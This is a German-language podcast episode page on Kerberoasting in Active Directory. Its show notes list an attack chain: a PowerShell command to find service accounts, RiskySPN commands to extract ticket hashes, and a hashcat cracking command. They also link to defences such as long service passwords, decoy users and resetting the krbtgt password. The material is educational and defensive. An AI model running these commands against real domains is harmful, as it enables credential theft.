Episode 4 - Kerberoasting Podcast Por  arte de portada

Episode 4 - Kerberoasting

Episode 4 - Kerberoasting

Escúchala gratis

Ver detalles del espectáculo

Acerca de esta escucha

In der 4. Episode des Podcast "Spaziergang mit Sicherheit" wird das Thema Kerberoasting behandelt Kerberoshttps://de.wikipedia.org/wiki/Kerberos_(Protokoll) Kerberoastinghttps://adsecurity.org/?p=3458 Ablauf Angriffmit dem folgenden Powershell Befehl (aus dem Active Directory Modul) können Zielbenutzer für den Kerberoasting Angriff identifiziert werden: Get-Aduser -filter {ServicePrinicpalName -ne "$null"} -Properties ServicePrincipalName https://github.com/cyberark/RiskySPN Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File hashes.txt hashcat.exe -m13100 -a0 hashes.txt -o hashes.out rockyou.txt -r OneRuleToRuleThemAll.rule Benchmark Hashcat für p3dn.24xlarge https://github.com/javydekoning/aws-hashcat/blob/master/p3dn.24xlarge.v6.1.1-120-g15bf8b730.cuda.txt https://duckduckgo.com/?q=+!password+28+strong Warum 28 Zeichen Passwortlänge für Servicebenutzerhttps://room362.com/post/2017/05-06-2017-password-magic-numbers/  Hausaufgabe der Episode das ThemaEinrichten des Köderbenutzershttps://adsecurity.org/?p=3513   Ändern des Passwort des Benutzer krbtgthttps://docs.microsoft.com/en-us/answers/questions/87978/reset-krbtgt-password.html Deutschsprachige Seite https://www.der-windows-papst.de/2019/07/03/krbtgt-password-reset/   Kontakthttps://twitter.com/spaziergangs www.infosec-podcast.de   Musik: Goto80 and the Uwe Schenk Band - Cable Swingin' Ferret (lizensiert unter CC0 1.0 Universal License)
adbl_web_global_use_to_activate_T1_webcro805_stickypopup
Todavía no hay opiniones